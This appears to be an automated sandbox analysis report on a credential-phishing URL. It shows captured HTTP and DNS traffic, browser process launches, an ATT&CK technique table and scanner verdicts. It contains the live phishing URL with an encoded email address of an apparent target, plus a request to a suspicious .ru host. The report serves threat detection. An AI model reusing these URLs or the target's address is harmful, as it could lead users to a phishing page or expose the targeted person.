Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe654bc286c7d0b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: brh5.bughtswo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://brh5.bughtswo.com/tgs0/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJlOERWakNzdlM0dlYwUVBFRXpUbUE9PSIsInZhbHVlIjoiL21kUEYrN3ptblJyN0RJWGs2byt3Y3F4ZmxaNXhoeTk3UlVZeERKODUzWEZGMW1DN1RQMVhmRjlyS2VzdnpIdjJVTzhwRDlTZnR4SlFmWVFwU25JSGFVYzhaWHBnSVhBWVdnU2RjM2gvM0hrYVFXbFZNZm53TWR5NVJNalRpSC8iLCJtYWMiOiIwMGVmYjdkMTM4NTY1MjkyYjRjODUyOTY4ZDFlZDAyNjE1MDE5NDEwZjA2YzQ4MmQ3YzM4YWNhODFhMmVkMDBlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjQxdDdBeXl5aFhvUlhEUWJhMW5TL2c9PSIsInZhbHVlIjoiNVpkOW5NeGRDNlZuUHlXeXIwUk9ONys1WFIvK0drZVZkNnk3WUF2MitzUFNXb01jTEFrZzRza3pXRFBRMVZOSld0dkxiSTZTYlplY25RYklPTkxiUVZSOGxFblFUNmloRnpQSVhQMmZTZHA2OFROVUk4UUJWOWY2ajE0QzBFb2UiLCJtYWMiOiJmY2JlNzdiZGQ3NTBmOGU4Y2VjMzQ1YTY2N2I2MTNlNjhiYjkwNjAxYzIwNDljNzQ1MTA4MTY4NjEyMjI2YWU2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe654bc286c7d0b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe654bc286c7d0b/1736277899837/y5opRdNzxhmLLrW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe654bc286c7d0b/1736277899837/0f8396233de30b1027fe5c528fbab38c7649993ff1d372703ff5864234108da6/ZukX3ZIDoYG8U1y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe654bc286c7d0b/1736277899837/y5opRdNzxhmLLrW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJN HTTP/1.1Host: co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://brh5.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oekpuvcikmwdxxivfxvpcxozbUNRPoHVMCDXFUWIMURZTCUJGKPMNGCPMKEEADRFNIRBIVDJN HTTP/1.1Host: co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: brh5.bughtswo.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: co16heoy9o7t20qy8lrfbp4k0wnmmnyittzmqkw7mv1enoliq4r5ljj9.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/997556941:1736274428:Q40FQN3rT6RRQJDNup5limrBB44wHApjQJuywVrZwHU/8fe654bc286c7d0b/_dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3192sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: _dFKbbP97K4m5N3QZExRKU5Hx6aTtPHSpi9H4iH7gcc-1736277897-1.1.1.1-AVLwPnk.rFvtxe3NrM9uH5bW3Un3nurPB9w4K161oTGkbe8TcI8xSJJj2HRm65B.sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 19:24:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIKQxfDh6dFZESxWI%2F6Om6jn6s%2BNOixtlheTS%2BHZbxRpBq3NEh1byGQKpNQBnR7RhZpfFSSVyOYZvh0QaOCq4AiUwwpZLgfxHKNmMRvfDWz4RzdLRmxzwj2M1kvS0w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=74514&min_rtt=74491&rtt_var=27951&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2271&delivery_rate=38232&cwnd=150&unsent_bytes=0&cid=c483a68a43ccff9c&ts=386&x=0"CF-Cache-Status: HITAge: 14131Server: cloudflareCF-RAY: 8fe654c55b69423a-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1701&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1896&delivery_rate=1629464&cwnd=170&unsent_bytes=0&cid=c6b32576ad7709c2&ts=4488&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 19:25:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: RoVGzrmHokensldrRbvoZynVxI9Vep1tydU=$jBnxV4I/PXH1JLpQServer: cloudflareCF-RAY: 8fe654d708d98c11-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 19:25:05 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: ZmYHvBgHUI1cSjYWuETnogtTMozSxWYYqlU=$/B0rK0MHDL5swLHScache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe654eacb087288-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 19:25:18 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: RNwgH28kqFU+fANooXQqAqSISckGYbXuQHs=$0vROJe7wkyI9AAD0Server: cloudflareCF-RAY: 8fe6553c8d4a728a-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_96.2.dr, chromecache_87.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_96.2.dr, chromecache_87.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal64.win@20/74@34/11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,2198589469627918427,17231179817136135105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,2198589469627918427,17231179817136135105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t100%Avira URL Cloudphishing
https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://brh5.bughtswo.com/favicon.ico100%Avira URL Cloudphishing
https://brh5.bughtswo.com/tgs0/100%Avira URL Cloudphishing
